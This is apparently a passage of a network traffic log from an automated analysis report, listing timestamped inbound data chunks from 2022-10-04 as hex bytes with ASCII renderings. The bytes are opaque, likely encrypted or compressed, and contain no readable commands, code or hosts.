                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29848INData Raw: 63 c7 6f 57 bd 72 d2 23 ea 62 c3 e9 53 cc b7 a8 ee 49 71 f4 be c2 02 67 38 7d 26 6c 7c d0 9b 61 9f 9a 1b 71 ba fb 87 0b 55 4b 2b 76 98 95 3f 45 17 85 3e e2 f3 0b 05 72 a9 3b ac 4f 43 59 95 43 f6 3e fb 49 73 6d 07 fc ab 4a d8 18 99 5a 42 7b 9e 37 ac d3 4d 7c 2c c9 a7 28 fe 06 f8 c6 72 15 58 05 88 92 e3 37 12 bd 72 de c5 67 b1 56 75 f9 c0 e8 b9 73 8f 79 d0 ce 4c aa 32 2b 29 ba c1 31 2e f4 c8 dc 2e 8f 04 66 40 2c f7 f9 f9 07 5d df 5d 6c 92 65 38 be 2a 55 85 76 1f c8 14 e0 81 e2 ae 17 cd 51 26 f2 f1 a5 4d 63 bf 02 4c 4e cf e0 33 36 02 cc 2a 1b 3a 0a d0 44 f8 2f c8 88 4b a6 76 46 32 4e de 24 44 27 3f a7 ec d3 76 49 ae e9 1e 42 34 b5 e5 e4 61 c0 74 fd 33 e9 d4 d1 f1 78 2c 06 57 0d fc f3 fc eb 9e 95 9a 0d 80 55 31 d5 c3 17 52 a3 6f 42 8f 42 b5 12 fe 8c e2 d9 c4
                                                                                                                                                                                                                                    Data Ascii: coWr#bSIqg8}&l|aqUK+v?E>r;OCYC>IsmJZB{7M|,(rX7rgVusyL2+)1..f@,]]le8*UvQ&McLN36*:D/KvF2N$D'?vIB4at3x,WU1RoBB
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29864INData Raw: 61 58 5a d6 e4 6f 28 5e 6c 25 51 bb 93 61 91 8e cd d0 84 65 a0 45 97 1d 01 eb e1 08 d4 5e 7d e7 fa bf ab 1d ac 97 d4 a4 cf 09 88 2e 4b 0e 8a 05 eb 1e a3 95 cd 03 f0 26 78 e8 3c 58 44 66 18 33 52 47 4e 79 98 47 91 dc 1d 3d 2e 02 2d 3a 7c 76 0d 28 81 6d ba 27 54 18 85 35 16 cd bd cc c3 50 8e 80 4e 9b ee 56 2a d9 c1 36 b1 63 6c f7 a0 4e fc fe b0 e2 d8 a3 f0 5c b2 70 63 ca 14 cb 95 1f c9 1d 2d 60 cb 1f a4 2c 54 42 a3 9e 4d d2 35 d2 e9 74 a0 ac 66 d3 f5 ed d0 e1 f8 8f 9d 9f 82 d3 c7 43 a6 2e ef 20 54 4e 06 6e c2 03 2a a3 38 fc f3 ed 72 b7 2d c4 54 32 f5 59 c3 ba 26 8f 93 21 a5 8c 12 75 eb 67 b4 f4 14 e8 88 98 6a 45 81 7a 1e d5 5b 90 aa a6 db 3f 27 25 85 ef 7e a2 67 51 39 b6 62 a2 a3 77 76 ac b9 76 9c b0 4e be fc 10 b7 33 af d9 15 27 6a e2 32 07 47 c2 d6 f8 d8
                                                                                                                                                                                                                                    Data Ascii: aXZo(^l%QaeE^}.K&x<XDf3RGNyG=.-:|v(m'T5PNV*6clN\pc-`,TBM5tfC. TNn*8r-T2Y&!ugjEz[?'%~gQ9bwvvN3'j2G
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29880INData Raw: b9 06 7e 45 70 cd d8 65 a2 ef 69 61 fe 8a c1 dc 8b 3b 4c 0f 8b 56 ad 9e 9e 43 41 d5 95 b3 cd 58 05 d2 a7 86 26 fa 7c f2 da e2 83 e2 b3 dd df ed 5b 0c 45 5d 93 f9 ae 8b e6 69 e5 61 bb 38 91 58 af 09 0a fd 13 1d fb 9e 91 1e 8d ad 14 fe 46 72 48 86 37 8f d0 98 d7 40 c8 17 1d 20 ed 95 14 55 96 27 55 72 07 ca 8b ab 6a a6 1e cc df 73 05 74 46 27 5f 97 dc 48 8f b3 0f 68 80 a2 1d 42 19 60 5a 14 23 df 1a c8 1c 6b d1 99 3f 76 d7 f2 29 83 2b a3 11 cc 2c 02 2e 16 87 fe 6c 2d 60 b3 ca 28 60 69 04 3b 9a 48 16 2d 31 e9 81 83 b1 cf 7f 39 5d 28 2c c0 71 5e fd c4 f6 f1 20 f7 fe a3 d4 10 c4 76 61 b2 73 c1 e1 a2 d3 28 4f c9 0b 91 8f 90 88 86 3e 15 8b 6f 10 1e 55 6b cd 69 73 2f 4d a3 39 a6 08 c9 4a ac a1 48 e9 7f 54 c3 2d 5e a2 b5 32 0b dd 5a c4 44 c7 3a a4 a9 75 74 d8 8b 06
                                                                                                                                                                                                                                    Data Ascii: ~Epeia;LVCAX&|[E]ia8XFrH7@ U'UrjstF'_HhB`Z#k?v)+,.l-`(`i;H-19](,q^ vas(O>oUkis/M9JHT-^2ZD:ut
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29896INData Raw: 8a 9c 63 6b 52 88 42 0f d8 bc 49 cf 29 53 f8 55 35 93 51 79 28 ca 5b 4f f8 41 6a 8d 63 21 e4 2c c0 3f 9f 5d be 8e f2 12 40 4a e9 d1 fa 42 95 fa 14 fd ec 07 74 73 47 f1 3a be 89 91 4c 3c 2c 42 12 d3 2a 22 b3 8e 90 d4 23 39 9c de 9c e9 99 59 b7 5a b0 68 20 25 00 ca ac f0 cb 28 02 64 8d 4e 63 61 9e 81 b9 81 a5 8d 0a 65 b7 01 83 47 65 00 62 ed 5c a3 39 b7 25 5e 08 d4 d6 2b a8 66 d5 48 bb ac 7b 67 be d9 8e d6 9b f8 fb 0f 89 9f e9 9a 0d 2d 84 61 56 3f 6d f9 58 51 a1 b3 94 4f 31 5c d4 f3 8d b4 ad 8f 33 21 76 23 70 57 0c 7a 41 80 25 3b ac 4c 66 99 66 d5 c9 7d 74 47 24 ee 8a 34 b6 09 85 77 67 93 7b 78 f4 67 1b 10 bc c3 25 1c a5 33 11 65 42 92 40 97 ce ea ef 8e fb 61 16 cd 95 37 73 1e 77 92 2e 2d 3a 0c f0 a1 1d 3d 73 c8 1b e7 12 53 63 c6 dd 91 62 5e 1b e8 77 c7 04
                                                                                                                                                                                                                                    Data Ascii: ckRBI)SU5Qy([OAjc!,?]@JBtsG:L<,B*"#9YZh %(dNcaeGeb\9%^+fH{g-aV?mXQO1\3!v#pWzA%;Lff}tG$4wg{xg%3eB@a7sw.-:=sScb^w
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29912INData Raw: 1f 85 87 ed 7c 5e 6a f7 5e dd 3b 63 8c ec 0f c0 b4 4b 1e 49 a4 7d eb be ab 59 b5 08 39 4f d6 8a 06 a3 a3 12 e4 73 04 ae 89 0b 5f dd dd e0 0d 11 39 3f a5 21 b5 97 25 58 0d d9 b3 bc af 35 10 53 bb e4 e8 e7 27 12 c8 43 d4 5d d2 45 a8 ef c1 e8 e7 cd c0 04 55 83 c3 05 94 10 eb dd 2e 28 38 93 51 9e 08 2c d7 03 1c 97 39 fd 13 b1 d2 2d bc 5d d4 4c a8 96 51 82 74 ec a5 5b fb 2c dc 5e 9b b8 44 7a 9d 6b a4 82 41 85 da 68 96 d7 af 68 1d 2d aa 5e bb 23 f4 a5 80 e0 93 83 91 34 57 6b 11 f4 c1 62 a5 f8 2b 83 5e 87 09 71 9e 87 13 33 18 14 46 fd 91 7e df f0 b3 e6 e3 1a 38 0a 41 10 4c 0d eb 85 58 27 7c ef 0c 33 6a b4 b5 ab 94 97 7a a2 b6 17 7a 20 53 78 7b b3 94 41 60 be 85 3a 82 1f 32 df 75 67 38 d0 a1 21 b9 dd 28 f8 ce 7d 9a 64 4f 4d 93 e9 50 de c0 07 bc 6f 3d 5e a5 06 41
                                                                                                                                                                                                                                    Data Ascii: |^j^;cKI}Y9Os_9?!%X5S'C]EU.(8Q,9-]LQt[,^DzkAhh-^#4Wkb+^q3F~8ALX'|3jzz Sx{A`:2ug8!(}dOMPo=^A
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29928INData Raw: f1 f0 92 8b 5b 6f b7 ad da 31 f5 9c a8 20 86 83 57 77 df f3 e7 a6 f0 2a f0 40 76 c1 dc 26 25 cd 5f 6a e2 d5 c0 8e e8 60 5c e7 7d 3e 0b 8c 2b e7 cc 25 cd 97 98 ad 50 1f 40 43 42 c3 21 72 10 da 97 a2 27 32 0a 10 23 55 ee f0 10 df 09 f7 5c 2b 98 5c db 20 0f fb 57 ba 96 c5 12 d4 c1 38 65 f5 19 26 86 d8 56 b4 2c 8b f2 7b b3 72 37 a1 56 9f 74 7d 72 3c 55 f8 53 a5 fb 89 c3 20 9f c0 95 86 4c e7 46 9c 39 eb 4d e7 c1 49 fc 63 2d 47 f1 8c 27 c9 16 8c 75 99 b4 01 e2 8d 4e 01 06 4d 11 46 e3 d7 3e 00 53 52 20 04 f6 3d f4 8b df cd 39 d4 7c 78 66 c0 51 dd d2 6b 63 c6 5e 25 09 db d3 77 2e f6 ce 5b 1f 2d 6d 18 1c ef 09 c8 8a 68 94 a7 59 e1 92 e1 59 6c f4 f9 4f e0 67 5b 5c 95 b4 ac 84 8b 6d 81 8a 57 41 73 ed de 8c 9b 00 2c cd 45 52 5d a2 39 b5 ed d8 d7 d7 1e 96 64 17 22 f5
                                                                                                                                                                                                                                    Data Ascii: [o1 Ww*@v&%_j`\}>+%P@CB!r'2#U\+\ W8e&V,{r7Vt}r<US LF9MIc-G'uNMF>SR =9|xfQkc^%w.[-mhYYlOg[\mWAs,ER]9d"
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29944INData Raw: 92 61 6f ae be 27 d4 37 17 bc 7c da 6d 4d 1f 82 53 9a a8 5b c9 83 35 c0 3e 25 de 7a 06 17 68 4a 96 04 5d 1e 65 be 14 ee 03 c2 13 21 22 cf ba 85 d7 b3 3e e5 33 3a b3 df e1 87 e6 e1 94 f6 8a 3f e5 d9 cc 8c 3b cc a7 1f cf 90 1b 3e 15 4b fc 7c b8 62 44 1c c2 03 2e 57 73 ef fa 35 30 c4 1f 69 5c 0f 78 e7 79 3c 9f 97 27 63 76 9b 18 0f fb a4 92 29 66 19 59 91 28 fc bf 78 52 3f 69 31 19 70 56 d7 dd 75 75 ce 8d c4 83 b6 75 cd 5a eb 88 e5 76 44 3c c4 0c 1e 26 c9 12 63 df 1a da f9 96 91 a5 e1 4f b8 28 bf e5 8c 06 a0 1a 6c 56 df d5 4a 54 8f 93 ef 43 0a d0 8a ac e0 e7 37 52 70 fb 7c 98 86 5d 18 42 c4 98 4c df b6 2c 34 aa b8 e2 91 06 8d ca a3 9c 4d 39 cd dc 07 54 95 c6 5d 6f b1 ee 83 d4 ad 7a 94 60 d4 be 9b 34 a2 a6 1a 8b 64 de 38 09 bf e9 be 35 52 7e ba 12 42 6f 2a 4d
                                                                                                                                                                                                                                    Data Ascii: ao'7|mMS[5>%zhJ]e!">3:?;>K|bD.Ws50i\xy<'cv)fY(xR?i1pVuuuZvD<&cO(lVJTC7Rp|]BL,4M9T]oz`4d85R~Bo*M
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29960INData Raw: 1c 4c 1c 2f 4f e5 53 82 4f af 2a cc e1 84 cf 9d 2d f0 ab b6 75 18 ff 7e bc 31 65 e2 b2 0c 82 0e 19 38 63 22 a4 36 6d 4b 3b b8 14 5c a1 1f ae 36 02 1f a1 23 ca 21 26 06 2f 86 26 1a dd ba 4b 97 e5 82 9a 22 3d ee 44 ff 45 4d 11 3f 6d 68 c5 c7 da 97 78 2e d4 09 4e 9a 92 cf ac 21 a9 06 c9 30 06 82 3f cd fb b6 57 1a a7 4e d3 95 c6 bc 96 09 28 0a 31 50 ce 00 5c cd f6 4a 2c c6 77 7a 6d 30 ba 8c 7b a6 63 f6 55 64 08 8f fe 59 e4 4a 6c af d7 52 ac 63 19 b5 3e dd ba 3a a6 3d 8c 87 17 c5 af 33 96 23 d5 1a 7d d0 90 fa 82 72 bf 21 c6 f5 b7 f4 cf e3 da 42 c7 c8 21 9f 67 0e 19 93 fe c2 da cd 17 a9 5b fe 4f ce 30 1b ef 9c 17 d3 9c 08 e3 8f 07 e7 42 f3 42 4e ed ab f6 d2 0e 60 9c c8 33 96 e4 5a ba 0d 93 d0 b8 4c d9 3f 66 4e c1 3d 94 c5 eb 1d 13 4d 20 81 fe 74 18 ea ad b9 30
                                                                                                                                                                                                                                    Data Ascii: L/OSO*-u~1e8c"6mK;\6#!&/&K"=DEM?mhx.N!0?WN(1P\J,wzm0{cUdYJlRc>:=3#}r!B!g[O0BBN`3ZL?fN=M t0
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29976INData Raw: e4 ef c0 30 10 15 1a e1 b5 6f 68 db c6 a2 c8 65 79 aa fc 71 09 35 d3 5a 4e 83 10 77 83 6f 20 0c 10 19 b6 0d 7b 73 2c e2 9d 2a a5 6a f5 e9 6d fa af 75 77 59 4b 3c b0 99 21 37 8d ad 6c ba 59 bc cc 4c d0 cc bf 90 d1 47 1f d2 b8 96 eb 98 74 63 a8 0a 18 db f1 5f 39 c1 b0 64 9c 29 62 86 d5 8f ef 8d 29 b3 0d 33 0b 8c 0b 21 a2 82 99 7b 06 36 39 ca c9 2b 99 63 19 b9 c1 79 cb 90 c5 f2 bc 85 9f f3 96 cf a4 73 74 24 b8 2c da 41 4f f0 b8 43 a7 2c a8 f1 7f e1 1e 20 2c 4f 02 5f c1 91 6c 7f 57 ba 9b c3 09 24 d5 83 97 92 05 6b 1e 72 e0 0b 98 15 69 63 23 f3 09 4f 03 d6 8a 6c 2f b3 57 89 2b 7a 49 4c b8 cd c4 cf e2 50 92 98 22 8b 5c b4 e6 50 f1 97 db dd 26 5c 35 f0 e4 72 07 ad 81 23 63 07 6b b7 1c 8f 5c 63 8f 1e 78 d2 77 b1 43 67 86 df d8 a6 e8 41 43 e3 29 9a 65 bd 57 a6 5f
                                                                                                                                                                                                                                    Data Ascii: 0oheyq5ZNwo {s,*jmuwYK<!7lYLGtc_9d)b)3!{69+cyst$,AOC, ,O_lW$kric#Ol/W+zILP"\P&\5r#ck\cxwCgAC)eW_
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC29992INData Raw: e4 ab 5d 9a 99 b6 d1 88 cf 0c bb 99 e3 84 ba 4e 3f f9 64 dc 78 53 89 e2 49 9c dd 40 f6 ad e1 bb 7f ad c3 98 68 b0 a7 54 1a 0f 9d 8f 29 b6 31 c1 5a e1 45 65 c6 99 d5 b4 77 69 14 da 8a 41 bd 22 ac 51 be 22 47 21 c4 8a 6d f2 fb 81 44 db 63 c1 8f 94 87 72 a7 65 23 d5 8f 3c 28 f3 ad 79 3d 56 0b 16 42 ae 77 8f 74 7b 66 f6 8f 49 4e 18 0a 08 56 c7 92 1f 71 fd f0 17 18 7a 20 b9 3a 4c 52 f2 94 71 18 ed 53 55 28 ca 99 98 a1 d7 81 d5 e4 ac 87 1d c0 fe 57 39 ea 54 46 47 f7 e3 3a 3e 80 35 eb 36 dd ab ca c9 6d 67 cf 97 3d 1b 87 61 81 45 59 4f b2 0a 65 1d c5 48 cc 9f 73 06 36 1b 10 d0 cb 2d 92 99 48 1f f4 25 60 3e 0a fe 92 db c9 04 d0 60 af c6 76 7c f3 35 3a 41 6c 72 f7 78 fd ec a6 23 25 60 0c 63 aa 4b cb 8b d2 41 09 79 6b e9 ae 4b 8b b8 6d d6 5a 89 80 d0 7e 64 3a d7 29
                                                                                                                                                                                                                                    Data Ascii: ]N?dxSI@hT)1ZEewiA"Q"G!mDcre#<(y=VBwt{fINVqz :LRqSU(W9TFG:>56mg=aEYOeHs6-H%`>`v|5:Alrx#%`cKAykKmZ~d:)
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30008INData Raw: a0 cd f4 7a 5f a5 c2 b0 ac 74 4b 3d f7 87 c1 97 20 6b 54 c4 93 14 b4 a5 48 68 0d 3b fd 15 61 25 9f 1a 18 13 89 8e 94 94 05 30 60 f3 b6 b1 f3 89 a6 7f fc 6a 7d 43 c9 0e 16 96 45 b5 97 e6 24 f0 89 e3 65 dd 2a b9 10 28 ae 83 19 64 0c 7c 1f 29 fa 48 85 30 30 cb 4f 40 83 21 53 68 30 4b 1b c1 67 81 64 d3 5e 9e 28 7c b6 e2 a1 aa bc 4f c3 1e cc de 77 03 fe cd e8 0c 08 70 42 20 45 53 9e 10 e2 b5 66 dd c9 65 d9 20 c6 93 c2 b5 58 98 8c 91 52 54 86 8b 13 9d f9 0d 70 af 70 cf 7d cd 1e 27 30 81 d6 6f d2 1f 28 51 48 f2 3b b6 8d ca eb fe 2b 49 92 31 10 65 7d 01 f3 f6 02 47 fa 24 67 be 19 0d 58 70 f9 a0 6f 2a de 86 7b 31 7c 3b 0a d7 67 d5 09 85 a3 61 b2 6a 7d 4f 57 b8 92 47 d5 c5 b4 b6 2a 89 1a 71 e3 a7 ca ba 05 dd 75 f5 85 d2 03 0e c5 15 47 40 a9 f5 b4 d6 6d d5 7a a8 fa
                                                                                                                                                                                                                                    Data Ascii: z_tK= kTHh;a%0`j}CE$e*(d|)H00O@!Sh0Kgd^(|OwpB ESfe XRTpp}'0o(QH;+I1e}G$gXpo*{1|;gaj}OWG*quG@mz
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30024INData Raw: 63 d0 97 81 cd 32 ec 31 c9 ac be 7e 0e e3 5a 67 f3 8b bf 04 c8 8b 3c ca 14 91 d8 40 3f 11 2e 43 56 99 79 78 0d 2c a2 c4 d0 a8 4d 4e 7d 18 ff 8e 0b 76 36 a7 3a 5c 1e b1 64 91 d7 51 45 54 b9 3c 80 ba 3f 81 29 ec ba fe 66 29 c1 ec 6b 82 55 2b 77 c5 d9 9e d9 1a 88 65 1e 92 43 10 e0 3b 5f 0c 52 50 34 ce 75 4f 4f a9 7b f3 6e 4f b9 52 54 80 e5 39 12 70 5d d1 e2 44 f8 31 a2 a8 4c 2b 37 48 89 76 be c1 82 55 4e 3b b8 74 05 af bc ef 7f da b1 b1 f8 83 0e 11 0d 13 c1 48 a9 50 be 1a 30 90 d2 77 cd bb ea f8 80 ed d4 76 7a 1e 79 66 e7 4e 42 f6 81 65 6e 57 e3 2a 38 45 3c cb 31 8d f5 93 ad 2f a8 3b 19 b4 a9 23 1a ff 1e cd a2 21 c1 a3 d3 c5 19 39 57 a6 2f 3a 05 c4 e8 d5 1f ab 08 a6 9a e8 68 47 db 3a 92 d8 37 3f b6 96 42 ee 1f eb 42 35 03 a0 d6 41 34 6a 56 d6 a4 e0 3b 2f 2f
                                                                                                                                                                                                                                    Data Ascii: c21~Zg<@?.CVyx,MN}v6:\dQET<?)f)kU+weC;_RP4uOO{nORT9p]D1L+7HvUN;tHP0wvzyfNBenW*8E<1/;#!9W/:hG:7?BB5A4jV;//
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30040INData Raw: 37 78 cd db 9a 31 90 ae 5f ff 3d 9d a8 72 22 a1 1b f5 a3 fb eb 4d 63 b1 83 f3 79 45 7b 9a 63 cb ef 81 ef 18 44 6b 3a c2 26 fc d3 1c ca d4 88 5d 37 5a a6 01 6f 76 9a 84 24 1d 23 f9 99 31 36 d8 58 28 78 b1 14 b5 12 2b af d4 16 38 cc 78 f6 d2 fc 3c 4e 05 e0 7b a9 84 5a e0 cf f7 2f ea e4 65 44 b8 2c 41 59 b7 0e ab 2b 39 3e bc 91 3c a5 83 bc 09 91 86 98 aa d9 46 58 dd 1e 65 90 dc 9e 83 ea d9 bf f1 f9 56 1a ca be ee 14 3d 1d 83 44 51 10 81 26 89 9a 80 d2 9d 9e 04 65 a8 62 81 7c 7b a7 d1 a1 06 b3 df b8 e6 ac 06 69 b3 67 cb a2 cf 1c d4 fe 2f bf e4 67 6d a3 d9 65 36 10 0b 55 65 fe 48 1d 9f 75 5d 03 62 82 83 04 6e 67 01 7c 19 f7 7d ba 43 f7 ef 14 69 db 38 21 93 59 fd 66 1d 24 34 8e 46 44 d1 b9 82 01 b8 ea f0 c0 bb af db be 11 19 dd 7e d7 5d b2 35 9c bc 6c f1 36 ae
                                                                                                                                                                                                                                    Data Ascii: 7x1_=r"McyE{cDk:&]7Zov$#16X(x+8x<N{Z/eD,AY+9><FXeV=DQ&eb|{ig/gme6UeHu]bng|}Ci8!Yf$4FD~]5l6
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30056INData Raw: 50 61 d0 be a2 9a 39 5e 03 16 0b cc bd 71 d0 25 ad c3 18 c6 2b 5f 41 5c f2 ba 6e 75 7d 19 5c 83 47 72 a3 db 68 5d a8 80 b3 3b c0 13 f6 07 26 62 34 90 de 2e ce 66 54 3a a6 17 79 b0 16 6a 0e 34 90 16 58 e0 83 54 9f 17 6b f8 96 55 02 d2 65 5c 61 e8 bc 61 51 8b 3e 80 98 9c 93 7c 2c 2b 3b 80 a5 df 47 a0 4c 6e d8 fe 56 e7 a7 08 67 8a 8f 8e 4b 5a 1a 27 81 59 46 6c 21 a6 b9 66 b7 6c d7 91 bb 92 3d dc 63 f1 b4 1c 89 36 55 f7 88 b1 3e ef ef ea a8 6f 57 ad 45 6d 67 3a 6b dd 4c b9 8b db d1 02 c6 2a e2 61 68 d7 52 0c ad 20 3d 89 7e 74 6e 62 18 e7 11 2d 13 d9 17 22 5a c8 ec dc b7 f8 61 fd 13 47 c8 cd 65 0c 22 be 24 d8 1c a7 40 99 82 ed 76 47 d8 32 7d c0 36 46 5f c2 95 de b8 f6 53 28 1f 8f c8 63 1e 11 53 ff 4b 62 d6 4c 51 a5 79 20 38 83 49 8a ba c1 9d 86 ea fa 27 9b 14
                                                                                                                                                                                                                                    Data Ascii: Pa9^q%+_A\nu}\Grh];&b4.fT:yj4XTkUe\aaQ>|,+;GLnVgKZ'YFl!fl=c6U>oWEmg:kL*ahR =~tnb-"ZaGe"$@vG2}6F_S(cSKbLQy 8I'
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30072INData Raw: 22 75 6e df d5 c1 5d 04 1f 53 90 81 0e 21 b7 78 e4 71 f0 04 c3 5a 88 e6 a4 67 8b 77 08 02 e3 8a 26 b7 73 ef 38 8b b3 9b f0 6f c8 47 46 a3 c0 b8 a1 cc ae 54 74 80 24 b2 70 d9 92 5b fd 8e d2 82 be de eb 2b aa 0f c5 07 a0 14 da 51 0d 11 71 72 1a b5 4f 98 74 fc 9c 16 1a 43 20 f3 ef ac 9e 7f cc f7 8a ab 4d 50 d7 3d 83 37 a4 53 a6 09 82 95 33 a4 a6 9c f4 ae 0e ed 06 8d 5b db 26 8e 70 13 2b d2 bc 52 98 cd bc 2f ae d3 c3 9b a2 8c 6c 6f fe 98 8e ad 45 ac 61 fa 7f 2a d6 99 90 43 8b 24 78 29 f1 9e 5d b5 fc e4 85 e4 08 9f e0 b1 81 34 b8 2f 9d fe c7 7b aa 86 fc 89 d2 ec b1 fc 8d c7 78 4a 88 61 5f 53 9a bd 26 8e 0f 73 45 13 c8 5c 79 cf 4a 1a e3 04 6b 2c c6 99 4d 18 31 ca bb 33 c2 73 81 bf 0c 25 af 3b 92 cc 9a 0d 1d 62 2a 85 39 40 e5 8e a5 c2 63 b5 26 da 85 62 6c 1e 7b
                                                                                                                                                                                                                                    Data Ascii: "un]S!xqZgw&s8oGFTt$p[+QqrOtC MP=7S3[&p+R/loEa*C$x)]4/{xJa_S&sE\yJk,M13s%;b*9@c&bl{
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30088INData Raw: 06 2d 49 84 73 5d 4f 75 ab d9 da 4f 05 5e 0b c8 06 43 92 44 74 0c 61 a9 19 e2 a5 88 98 fa 9a e3 be 21 18 72 3f 06 cd b8 64 75 66 6e d4 d6 81 b7 57 4c 34 56 b6 6c 45 ca 48 3e 78 b4 98 20 af 6e 4e 66 d4 41 06 29 f3 a1 1b b7 09 e4 ea 66 2b 02 5c 62 a6 97 59 9f 27 99 c0 93 ed 6d 7c 64 2c cf 7f 23 28 86 9e b5 7e 74 36 1c fb 1d 8e bd 03 1e d8 8a 11 51 8e b0 94 d5 ce 96 41 9a 0e eb b7 21 a0 64 b8 a4 db 70 ac 75 b3 d3 b8 2b 25 a0 ee 39 d2 ab 1d 20 d3 ed 58 2a 11 01 c3 e6 29 c4 c6 ae 03 7d 77 7e 28 ec 7a 32 b4 b3 ad ef 02 c1 7e cb 84 00 5c b8 c0 cd 5d aa 9b 4f 3d 81 c8 d5 a0 89 53 c7 a7 5d c6 9a 4b 85 64 25 70 fb dc 10 42 67 d6 b6 94 f2 59 f3 af 38 d0 97 76 cc 81 cb 94 50 c2 59 9c 6c 8a d8 5c 0c d0 48 97 a6 99 88 01 e1 88 dc 9f b7 ed 6e 34 d3 7d 51 ee 7a 20 4b ae
                                                                                                                                                                                                                                    Data Ascii: -Is]OuO^CDta!r?dufnWL4VlEH>x nNfA)f+\bY'm|d,#(~t6QA!dpu+%9 X*)}w~(z2~\]O=S]Kd%pBgY8vPYl\Hn4}Qz K
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30104INData Raw: 2b 6c 3d 56 10 8b f8 b8 9b db f4 bc d3 48 b0 13 88 3b 59 78 d5 5b e2 9d af 4a e7 ca 70 2b 7e 7a 8c dc 58 2e a4 0c 21 b5 48 16 ed 27 e5 a3 39 f8 6e 63 ab e9 3d dc b6 82 f5 cd b8 d3 84 f2 e8 a9 75 70 93 fe 6f 3a 73 6d 39 f1 e5 ca 8a 56 27 7c f0 68 ae 2c e2 37 0b c4 85 8c 87 8f 5d fb 1b 22 b1 5d e4 d3 25 1f 9e 98 02 a2 51 32 f5 4a e8 cb 15 ab 2f 54 01 79 77 d9 13 e1 72 32 d3 f8 48 18 35 d2 1c c0 a9 e1 d9 09 d6 f8 bc b3 a0 93 9c 03 e7 16 0a d6 ce 52 c0 5f 90 39 4b ca 7f 4e 0d 8c df fe 1f cd 43 72 92 35 19 4d 27 b7 1b 37 14 40 50 a6 46 02 44 18 52 a8 fd 14 f1 83 18 21 fc bc 56 01 8c c2 ce aa bf 8d 50 8a 46 ba c3 b3 43 50 86 76 87 0d be b0 75 4c 5c 12 01 bb 9f 45 d1 00 ab a9 e6 98 22 18 8a 62 4a 14 bb 4d d6 9d 9a 30 93 b6 2b 6a 21 0d 0b 3a ac 82 0f 58 61 ad e8
                                                                                                                                                                                                                                    Data Ascii: +l=VH;Yx[Jp+~zX.!H'9nc=upo:sm9V'|h,7]"]%Q2J/Tywr2H5R_9KNCr5M'7@PFDR!VPFCPvuL\E"bJM0+j!:Xa
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30120INData Raw: 3c bf bd 88 75 79 44 c6 00 04 16 cf 1f 5d ed ef bd f1 3b 60 d6 49 c5 85 56 39 0c 27 7f fc 2b e9 e0 dc 7e 5a 98 31 f6 05 2f 53 b1 79 77 ee 5d e8 d9 eb 78 57 c5 3d 02 45 a9 23 dc 46 44 88 e1 67 f7 bd 67 d7 36 ab d8 27 c5 b3 79 a5 1e 40 e3 66 5a 04 2d 4a 5b e1 f2 85 7c 45 09 ad 35 06 2c 54 af 07 9e 11 30 20 82 a5 a0 3a e4 05 c0 62 d2 1c 0f df 31 b0 12 f3 91 32 35 ff 62 7f 99 e4 b8 6a a4 44 bb 0e 8d 62 84 27 b4 a2 a3 6f c4 25 b4 5b 84 c1 55 45 70 44 29 08 f3 e8 f5 dc 93 0c 7f fb 3f a6 9e 98 0a c3 ca 01 a0 16 8d 0f 2f 93 43 28 cb 45 84 e1 a8 09 e3 02 ec 7a a4 01 3e 2b b8 9b 9e ae 96 c2 5a 1b 71 58 27 02 3d 62 6a 0d ee 22 ba 76 a2 e9 33 3e 10 3d 48 44 63 81 26 69 4f fd fb ed b9 86 6e b9 6d da 67 b8 41 43 25 86 32 ca e6 27 a7 20 c0 01 41 8b 66 21 36 fe ec a4 e5
                                                                                                                                                                                                                                    Data Ascii: <uyD];`IV9'+~Z1/Syw]xW=E#FDgg6'y@fZ-J[|E5,T0 :b125bjDb'o%[UEpD)?/C(Ez>+ZqX'=bj"v3>=HDc&iOnmgAC%2' Af!6
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC30136INData Raw: ea ee bc ab a4 9e 56 b3 95 5b be 93 23 f1 3c 57 2c a9 eb d3 6d e2 cf 33 8f 07 67 24 87 95 fa 37 97 68 51 3b bd b3 aa 0b 96 8d e6 76 61 0d 29 3e 8b 99 f2 04 ae 13 4c 93 d6 4b 01 8e ba 3b 3f ea ad d8 92 d0 72 2d 2b 46 7a ae a1 51 bf a4 97 61 4c 56 50 11 50 bb 3b eb 8d c5 46 b5 b6 40 ab 89 94 f0 4f 39 cb f8 b4 c5 57 e3 f4 6b 71 f1 e0 f4 6d 44 a7 7f 28 e3 e6 33 c3 98 6c 4d a2 39 9c 33 7b 43 7e 7c cf 4c 42 55 3a 56 8a 83 01 3a 13 37 27 32 f3 8f 68 a0 be 3f b1 a0 c8 40 8c d9 fe 74 3f d9 20 cd 17 27 23 78 52 18 45 63 f4 ae f6 c5 71 f1 23 fa e5 80 74 f0 bd af 3b 09 7e a4 ba a5 57 56 25 ff 4b 20 ed 76 85 3d fe c0 81 8e 68 ab e3 55 bd 70 e9 88 59 f3 6f 33 a9 1c 98 1a cb 4f 82 98 5d 04 9a df 3c ac f2 dc ea 01 a3 3a c2 b0 15 6f 8e 60 05 00 58 81 c2 b4 5e 9f 80 90 76
                                                                                                                                                                                                                                    Data Ascii: V[#<W,m3g$7hQ;va)>LK;?r-+FzQaLVPP;F@O9WkqmD(3lM93{C~|LBU:V:7'2h?@t? '#xREcq#t;~WV%K v=hUpYo3O]<:o`X^v
